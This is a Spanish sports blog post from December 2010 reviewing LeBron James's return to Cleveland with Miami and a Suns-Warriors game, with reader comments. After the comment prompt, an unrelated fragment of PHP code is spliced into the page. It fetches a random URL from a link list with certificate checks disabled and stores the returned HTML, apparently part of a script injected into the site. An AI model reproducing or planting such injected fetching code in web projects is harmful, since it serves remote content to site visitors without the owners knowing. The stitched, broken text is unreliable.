La Crónica (02/12/2010)

03 de December de 2010 por TheDeerHunter

Volvía LeBron a lanzar los polvos en el Quicken Loans Arena. Anoche ya no hacía tanta gracía el espectáculo y el respetable bramaba de rabia y resentimiento. “Deberíamos haber elegido a Darko”, rezaba una pancarta. Qué fina es la línea que separa el amor del odio. El ambiente hostil sólo se vio pausado un instante con un abrazo valiente de Mo Williams al que fuera su líder. Fue el único gesto amable de la noche.

Pero el que fuera Rey de todo Ohio no venía precisamente a firmar la pipa de la paz. “Tengo el mayor de los respetos por esta franquicia y el mayor de los respetos por estos fans”. Palabras huecas. Se dedicó todo el partido a retar a su ex-público y también a burlarse de sus ex-compañeros en cuanto tuvo ocasión. Demostró también tener sus propias heridas abiertas.

El partido fue un duelo entre uno y miles. Cada jugada, por más simple que fuera era tratada con una transcendencia casi definitiva. Una canasta normal en la cara de LeBron podía celebrarse como si de un gol en la mismísima final de la Champions League se tratara. Todo fue exceso, exageración.

Pero el baloncesto se mide a veces por este tipo de detalles. El talento de LeBron también reside en estar preparado a este tipo de cosas. Además tuvo la suerte de que sus compañeros le arroparon bien. Los Cavs, sin embargo, flaquearon ante tanta ansiedad y cuajaron su peor partido de la temporada en el peor momento para ellos (118-90). Apenas hubo una mitad de partido. El resto fue silencio impuesto por “The Betrayer”.

En el otro partido los Suns se impusieron a los Warriors (107-101). Ellis y David Lee no fueron suficientes, pues flaquearon Curry y, sobre todo, Biedrins. Los Suns, sin embargo, mostraron una gran cohesión con Nash repartiendo a la perfección, Richardson y Hill ejecutando y el resto haciendo en cada momento lo que tocaba. Gran partido para recuperar el 50% de victorias.

PREMIOS

MVP: LeBron James cuajó el mejor partido en la historia en el que un MVP visita por primera vez a su ex-equipo donde logró el premio. 38 puntos, 5 rebotes, 8 asistencias, 1 robo y 1 tapón en la mismisima boca del lobo.

El rookie: Jeff Adrien y Jeremy Lin fueron los únicos rookies que jugaron en la jornada, pero son prácticamente intrascendentes para sus Warriors.

La sorpresa: Por un lado el sólido partido de Channing Frye. Un 10-10 ante la dupla Biedrins-Lee. Por el otro, Jimmy Jones anotando 18 puntos y recogiendo 6 rebotes con una serie magistral en el lanzamiento. Lo bueno que tuvo es que los gritos y los abucheos no fueron ninguno para él.

La decepción: Está claro. En Cleveland querían humillar a LeBron… pero les salió el tiro por la culata. Individualmente nomino a Andris Biedrins. Tiene mérito coger 3 rebotes frente el insuperable juego interior de los Suns.

Comenta

6 comentarios a esta entrada

  1. KB #24 dice:
    #1

    TheDeerHunter, diria que se llama James Jones! En ningún momento ningún espectador del Quicken’s tenía la esperanza de poder ganar el partido!

    Gran blog!

      Citar

  2. TheDeerHunter dice:
    #2

    Jimmy es el diminutivo de James ¿no?

      Citar

  3. Busky23 dice:
    #3

    Llegó,vió y venció.38 pts en 30 minutos deja bien a las claras las intenciones con las que llegó The King a su ciudad natal,ni un ambiente infernal dirigido directamente a su persona amedrento a James,eso si,su soberbia,prepotencia y chulería es tremendamente proporcional a su innegable calidad.K.O. técnico en el primer asalto.
    Muy buena la ironía con Biedrins Deer 😉

      Citar

  4. GreenPride dice:
    #4

    Muy buen partido de LeBron y los Heat ante un ambiente hostil. LeBron se salió y sus compañeros le ayudaron bien ante unos Cavs que no supieron como atacar la defensa de Miami. Como era de esperar unos Heat motivados barrieron a unos Cavs que no dan para más

      Citar

  5. Txusma dice:
    #5

    En Cleveland han parecido olvidar q si hubieran drafteado a Darko no sabrían ni que es clasificarse para una final de Conferencia.

      Citar

  6. KB # 24 dice:
    #6

    jajaja perdona DeerHunter! no lo había pensado! pues sí, tienes toda la razón!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>